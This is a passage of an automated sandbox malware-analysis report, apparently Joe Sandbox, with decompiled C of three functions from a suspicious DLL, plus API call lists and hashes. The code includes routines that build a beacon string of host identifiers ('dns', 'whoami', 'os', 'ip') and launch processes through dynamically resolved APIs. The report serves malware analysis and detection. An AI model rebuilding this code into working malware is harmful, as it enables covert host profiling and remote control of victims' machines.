				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2f9d018; // 0x99d5691b
				asm("bswap eax");
				_t27 =  *0x2f9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2f9d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2f9d00c; // 0x62819102
				asm("bswap eax");
				_t30 =  *0x2f9d27c; // 0x44a5a8
				_t3 = _t30 + 0x2f9e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x2f9d02c,  *0x2f9d004, _t25);
				_t33 = E02F91C1A();
				_t34 =  *0x2f9d27c; // 0x44a5a8
				_t4 = _t34 + 0x2f9e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02F954BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2f9d27c; // 0x44a5a8
					_t6 = _t83 + 0x2f9e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2f9d238, 0, _t96);
				}
				_t97 = E02F97649();
				if(_t97 != 0) {
					_t78 =  *0x2f9d27c; // 0x44a5a8
					_t8 = _t78 + 0x2f9e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2f9d238, 0, _t97);
				}
				_t98 =  *0x2f9d32c; // 0x33e95b0
				_a32 = E02F99395(0x2f9d00a, _t98 + 4);
				_t42 =  *0x2f9d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2f9d27c; // 0x44a5a8
					_t11 = _t74 + 0x2f9e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2f9d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2f9d27c; // 0x44a5a8
					_t13 = _t71 + 0x2f9e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2f9d238, 0, 0x800);
					if(_t100 != 0) {
						E02F97A80(GetTickCount());
						_t50 =  *0x2f9d32c; // 0x33e95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2f9d32c; // 0x33e95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2f9d32c; // 0x33e95b0
						_t103 = E02F98307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2f9c2ac);
							_push(_t103);
							_t62 = E02F93CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02F91199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02F9A1B0();
								}
								HeapFree( *0x2f9d238, 0, _v44);
							}
							HeapFree( *0x2f9d238, 0, _t103);
						}
						HeapFree( *0x2f9d238, 0, _t100);
					}
					HeapFree( *0x2f9d238, 0, _a24);
				}
				HeapFree( *0x2f9d238, 0, _t105);
				return _a12;
			}
















































                                                                                                                                                                                                                                    0x02f9a279
                                                                                                                                                                                                                                    0x02f9a279
                                                                                                                                                                                                                                    0x02f9a279
                                                                                                                                                                                                                                    0x02f9a280
                                                                                                                                                                                                                                    0x02f9a286
                                                                                                                                                                                                                                    0x02f9a28e
                                                                                                                                                                                                                                    0x02f9a290
                                                                                                                                                                                                                                    0x02f9a290
                                                                                                                                                                                                                                    0x02f9a29d
                                                                                                                                                                                                                                    0x02f9a2a8
                                                                                                                                                                                                                                    0x02f9a2ab
                                                                                                                                                                                                                                    0x02f9a2b6
                                                                                                                                                                                                                                    0x02f9a2b9
                                                                                                                                                                                                                                    0x02f9a2be
                                                                                                                                                                                                                                    0x02f9a2c1
                                                                                                                                                                                                                                    0x02f9a2c6
                                                                                                                                                                                                                                    0x02f9a2c9
                                                                                                                                                                                                                                    0x02f9a2d5
                                                                                                                                                                                                                                    0x02f9a2e2
                                                                                                                                                                                                                                    0x02f9a2e4
                                                                                                                                                                                                                                    0x02f9a2ea
                                                                                                                                                                                                                                    0x02f9a2ef
                                                                                                                                                                                                                                    0x02f9a2fa
                                                                                                                                                                                                                                    0x02f9a2fc
                                                                                                                                                                                                                                    0x02f9a2ff
                                                                                                                                                                                                                                    0x02f9a306
                                                                                                                                                                                                                                    0x02f9a30a
                                                                                                                                                                                                                                    0x02f9a30c
                                                                                                                                                                                                                                    0x02f9a311
                                                                                                                                                                                                                                    0x02f9a31d
                                                                                                                                                                                                                                    0x02f9a31f
                                                                                                                                                                                                                                    0x02f9a32b
                                                                                                                                                                                                                                    0x02f9a32d
                                                                                                                                                                                                                                    0x02f9a32d
                                                                                                                                                                                                                                    0x02f9a338
                                                                                                                                                                                                                                    0x02f9a33c
                                                                                                                                                                                                                                    0x02f9a33e
                                                                                                                                                                                                                                    0x02f9a343
                                                                                                                                                                                                                                    0x02f9a34f
                                                                                                                                                                                                                                    0x02f9a351
                                                                                                                                                                                                                                    0x02f9a35d
                                                                                                                                                                                                                                    0x02f9a35f
                                                                                                                                                                                                                                    0x02f9a35f
                                                                                                                                                                                                                                    0x02f9a365
                                                                                                                                                                                                                                    0x02f9a378
                                                                                                                                                                                                                                    0x02f9a37c
                                                                                                                                                                                                                                    0x02f9a383
                                                                                                                                                                                                                                    0x02f9a386
                                                                                                                                                                                                                                    0x02f9a38b
                                                                                                                                                                                                                                    0x02f9a396
                                                                                                                                                                                                                                    0x02f9a398
                                                                                                                                                                                                                                    0x02f9a39b
                                                                                                                                                                                                                                    0x02f9a39b
                                                                                                                                                                                                                                    0x02f9a39d
                                                                                                                                                                                                                                    0x02f9a3a4
                                                                                                                                                                                                                                    0x02f9a3a7
                                                                                                                                                                                                                                    0x02f9a3ac
                                                                                                                                                                                                                                    0x02f9a3b6
                                                                                                                                                                                                                                    0x02f9a3b8
                                                                                                                                                                                                                                    0x02f9a3c0
                                                                                                                                                                                                                                    0x02f9a3d9
                                                                                                                                                                                                                                    0x02f9a3dd
                                                                                                                                                                                                                                    0x02f9a3e9
                                                                                                                                                                                                                                    0x02f9a3ee
                                                                                                                                                                                                                                    0x02f9a3f7
                                                                                                                                                                                                                                    0x02f9a408
                                                                                                                                                                                                                                    0x02f9a40c
                                                                                                                                                                                                                                    0x02f9a415
                                                                                                                                                                                                                                    0x02f9a41b
                                                                                                                                                                                                                                    0x02f9a428
                                                                                                                                                                                                                                    0x02f9a435
                                                                                                                                                                                                                                    0x02f9a43b
                                                                                                                                                                                                                                    0x02f9a447
                                                                                                                                                                                                                                    0x02f9a44d
                                                                                                                                                                                                                                    0x02f9a44e
                                                                                                                                                                                                                                    0x02f9a455
                                                                                                                                                                                                                                    0x02f9a459
                                                                                                                                                                                                                                    0x02f9a45f
                                                                                                                                                                                                                                    0x02f9a466
                                                                                                                                                                                                                                    0x02f9a46d
                                                                                                                                                                                                                                    0x02f9a473
                                                                                                                                                                                                                                    0x02f9a47a
                                                                                                                                                                                                                                    0x02f9a47e
                                                                                                                                                                                                                                    0x02f9a489
                                                                                                                                                                                                                                    0x02f9a490
                                                                                                                                                                                                                                    0x02f9a494
                                                                                                                                                                                                                                    0x02f9a49d
                                                                                                                                                                                                                                    0x02f9a49d
                                                                                                                                                                                                                                    0x02f9a4ae
                                                                                                                                                                                                                                    0x02f9a4ae
                                                                                                                                                                                                                                    0x02f9a4bd
                                                                                                                                                                                                                                    0x02f9a4bd
                                                                                                                                                                                                                                    0x02f9a4cc
                                                                                                                                                                                                                                    0x02f9a4cc
                                                                                                                                                                                                                                    0x02f9a4de
                                                                                                                                                                                                                                    0x02f9a4de
                                                                                                                                                                                                                                    0x02f9a4ed
                                                                                                                                                                                                                                    0x02f9a4fe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F9A290
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A2DD
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A2FA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A31D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9A32D
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A34F
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9A35F
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A396
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 02F9A3B6
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F9A3D3
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F9A3E3
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F9A3F7
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F9A415
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?,033E95B0), ref: 02F98332
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrlen.KERNEL32(?,?,?,02F9A428,?,033E95B0), ref: 02F9833A
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: strcpy.NTDLL ref: 02F98351
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: lstrcat.KERNEL32(00000000,?), ref: 02F9835C
                                                                                                                                                                                                                                      • Part of subcall function 02F98307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F98379
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,02F9C2AC,?,033E95B0), ref: 02F9A447
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrlen.KERNEL32(033E87FA,00000000,00000000,73FCC740,02F9A453,00000000), ref: 02F93CD8
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrlen.KERNEL32(?), ref: 02F93CE0
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrcpy.KERNEL32(00000000,033E87FA), ref: 02F93CF4
                                                                                                                                                                                                                                      • Part of subcall function 02F93CC8: lstrcat.KERNEL32(00000000,?), ref: 02F93CFF
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02F9A466
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F9A46D
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02F9A47A
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02F9A47E
                                                                                                                                                                                                                                      • Part of subcall function 02F91199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76D681D0), ref: 02F9124B
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02F9A4AE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02F9A4BD
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,033E95B0), ref: 02F9A4CC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9A4DE
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F9A4ED
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3080378247-0
                                                                                                                                                                                                                                    • Opcode ID: 4e80e4afa1f8bb2d2a0906a8f025aa73446cfbd74184494784acd345397147a3
                                                                                                                                                                                                                                    • Instruction ID: 5ce70c321341c45595022432c78a9714f4f9e01efb6a9ef8ce5717f836ecf580
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e80e4afa1f8bb2d2a0906a8f025aa73446cfbd74184494784acd345397147a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A361C171D80208AFEB11EB64EC48F5AB7E8EB48BC0F250815FA08D7260D735E925DF65
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                                                                                    			E02F9816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2f9d33c; // 0x33e9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02F970F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2f9c1ac;
				}
				_t46 = E02F98022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02F92049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2f9d27c; // 0x44a5a8
						_t16 = _t75 + 0x2f9eb28; // 0x530025
						 *0x2f9d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02F970F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2f9c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02F92049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02F99039(_v20);
						} else {
							_t66 =  *0x2f9d27c; // 0x44a5a8
							_t31 = _t66 + 0x2f9ec48; // 0x73006d
							 *0x2f9d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02F99039(_v12);
				}
				return _v24;
			}




























                                                                                                                                                                                                                                    0x02f98174
                                                                                                                                                                                                                                    0x02f9817a
                                                                                                                                                                                                                                    0x02f98181
                                                                                                                                                                                                                                    0x02f98187
                                                                                                                                                                                                                                    0x02f9818b
                                                                                                                                                                                                                                    0x02f9818f
                                                                                                                                                                                                                                    0x02f98192
                                                                                                                                                                                                                                    0x02f98199
                                                                                                                                                                                                                                    0x02f9819c
                                                                                                                                                                                                                                    0x02f9819e
                                                                                                                                                                                                                                    0x02f9819e
                                                                                                                                                                                                                                    0x02f981a7
                                                                                                                                                                                                                                    0x02f981ae
                                                                                                                                                                                                                                    0x02f981b1
                                                                                                                                                                                                                                    0x02f981b7
                                                                                                                                                                                                                                    0x02f981c1
                                                                                                                                                                                                                                    0x02f981ca
                                                                                                                                                                                                                                    0x02f981d1
                                                                                                                                                                                                                                    0x02f981ea
                                                                                                                                                                                                                                    0x02f981f1
                                                                                                                                                                                                                                    0x02f981f4
                                                                                                                                                                                                                                    0x02f981fd
                                                                                                                                                                                                                                    0x02f98206
                                                                                                                                                                                                                                    0x02f98217
                                                                                                                                                                                                                                    0x02f98220
                                                                                                                                                                                                                                    0x02f98224
                                                                                                                                                                                                                                    0x02f98228
                                                                                                                                                                                                                                    0x02f9822f
                                                                                                                                                                                                                                    0x02f98232
                                                                                                                                                                                                                                    0x02f98234
                                                                                                                                                                                                                                    0x02f98234
                                                                                                                                                                                                                                    0x02f9823e
                                                                                                                                                                                                                                    0x02f98247
                                                                                                                                                                                                                                    0x02f9824e
                                                                                                                                                                                                                                    0x02f98266
                                                                                                                                                                                                                                    0x02f9826a
                                                                                                                                                                                                                                    0x02f982a7
                                                                                                                                                                                                                                    0x02f9826c
                                                                                                                                                                                                                                    0x02f9826f
                                                                                                                                                                                                                                    0x02f98277
                                                                                                                                                                                                                                    0x02f98288
                                                                                                                                                                                                                                    0x02f98294
                                                                                                                                                                                                                                    0x02f9829c
                                                                                                                                                                                                                                    0x02f982a0
                                                                                                                                                                                                                                    0x02f982a0
                                                                                                                                                                                                                                    0x02f9826a
                                                                                                                                                                                                                                    0x02f982af
                                                                                                                                                                                                                                    0x02f982b4
                                                                                                                                                                                                                                    0x02f982bb

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02F98181
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,80000002,00000005), ref: 02F981C1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 02F981CA
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 02F981D1
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(80000002), ref: 02F981DE
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000004), ref: 02F9823E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02F98247
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02F9824E
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 02F98255
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2535036572-0
                                                                                                                                                                                                                                    • Opcode ID: 094690518737ca457b7a564afb7fc5c58635a8a3df9f51a4527d449b6a903003
                                                                                                                                                                                                                                    • Instruction ID: 8fd73de919553a1dc4ae3ea46bf996bb94fdd8f6c43f69df1714cf8ef5e97238
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 094690518737ca457b7a564afb7fc5c58635a8a3df9f51a4527d449b6a903003
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35416B72D00218FFEF11AFA4CC05A9EBBB5EF48784F154055EE04A7220D7359A61EF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                    			E02F9205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02F9692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02F9A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2f9d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2f9d27c; // 0x44a5a8
					_t18 = _t47 + 0x2f9e3e6; // 0x73797325
					_t68 = E02F995B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2f9d27c; // 0x44a5a8
						_t19 = _t50 + 0x2f9e747; // 0x33e8cef
						_t20 = _t50 + 0x2f9e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02F984D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02F984D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2f9d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02F99039(_t70);
				goto L12;
			}


















                                                                                                                                                                                                                                    0x02f92066
                                                                                                                                                                                                                                    0x02f92066
                                                                                                                                                                                                                                    0x02f92075
                                                                                                                                                                                                                                    0x02f9207e
                                                                                                                                                                                                                                    0x02f92081
                                                                                                                                                                                                                                    0x02f9218e
                                                                                                                                                                                                                                    0x02f92195
                                                                                                                                                                                                                                    0x02f92195
                                                                                                                                                                                                                                    0x02f92090
                                                                                                                                                                                                                                    0x02f92098
                                                                                                                                                                                                                                    0x02f9209d
                                                                                                                                                                                                                                    0x02f920a0
                                                                                                                                                                                                                                    0x02f920b5
                                                                                                                                                                                                                                    0x02f920bb
                                                                                                                                                                                                                                    0x02f920bc
                                                                                                                                                                                                                                    0x02f920bf
                                                                                                                                                                                                                                    0x02f920c5
                                                                                                                                                                                                                                    0x02f920c8
                                                                                                                                                                                                                                    0x02f920cd
                                                                                                                                                                                                                                    0x02f920d5
                                                                                                                                                                                                                                    0x02f920e1
                                                                                                                                                                                                                                    0x02f920e5
                                                                                                                                                                                                                                    0x02f92175
                                                                                                                                                                                                                                    0x02f920eb
                                                                                                                                                                                                                                    0x02f920eb
                                                                                                                                                                                                                                    0x02f920f0
                                                                                                                                                                                                                                    0x02f920f7
                                                                                                                                                                                                                                    0x02f9210b
                                                                                                                                                                                                                                    0x02f9210f
                                                                                                                                                                                                                                    0x02f9215e
                                                                                                                                                                                                                                    0x02f92111
                                                                                                                                                                                                                                    0x02f92112
                                                                                                                                                                                                                                    0x02f92119
                                                                                                                                                                                                                                    0x02f92132
                                                                                                                                                                                                                                    0x02f92134
                                                                                                                                                                                                                                    0x02f92138
                                                                                                                                                                                                                                    0x02f9213f
                                                                                                                                                                                                                                    0x02f92159
                                                                                                                                                                                                                                    0x02f92141
                                                                                                                                                                                                                                    0x02f9214a
                                                                                                                                                                                                                                    0x02f9214f
                                                                                                                                                                                                                                    0x02f9214f
                                                                                                                                                                                                                                    0x02f9213f
                                                                                                                                                                                                                                    0x02f9216d
                                                                                                                                                                                                                                    0x02f9216d
                                                                                                                                                                                                                                    0x02f920e5
                                                                                                                                                                                                                                    0x02f9217c
                                                                                                                                                                                                                                    0x02f92185
                                                                                                                                                                                                                                    0x02f92189
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02F9207A,?,00000001,?,?,00000000,00000000), ref: 02F96951
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02F96973
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02F96989
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02F9699F
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02F969B5
                                                                                                                                                                                                                                      • Part of subcall function 02F9692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02F969CB
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F920C8
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,02F923E9,63699BCE,02F91354,73797325), ref: 02F995C2
                                                                                                                                                                                                                                      • Part of subcall function 02F995B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02F995DC
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,033E8CEF,73797325), ref: 02F920FE
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02F92105
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F9216D
                                                                                                                                                                                                                                      • Part of subcall function 02F984D5: GetProcAddress.KERNEL32(36776F57,02F921E5), ref: 02F984F0
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 02F9214A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02F9214F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001), ref: 02F92153
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3075724336-0
                                                                                                                                                                                                                                    • Opcode ID: f722e70e85de42c6fa0e550703dd5e7dcee5d619f38e9c4093bd3c6f3486c566
                                                                                                                                                                                                                                    • Instruction ID: 90ca2f00a9e3b6d8e597af31a0605736caf87e6d76974c40da897c1477a2daa5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f722e70e85de42c6fa0e550703dd5e7dcee5d619f38e9c4093bd3c6f3486c566
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF310D72D0020CBFEF10AFA4DC88D9EBBBDEB48384F11446AE715A7121D735A9558F60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

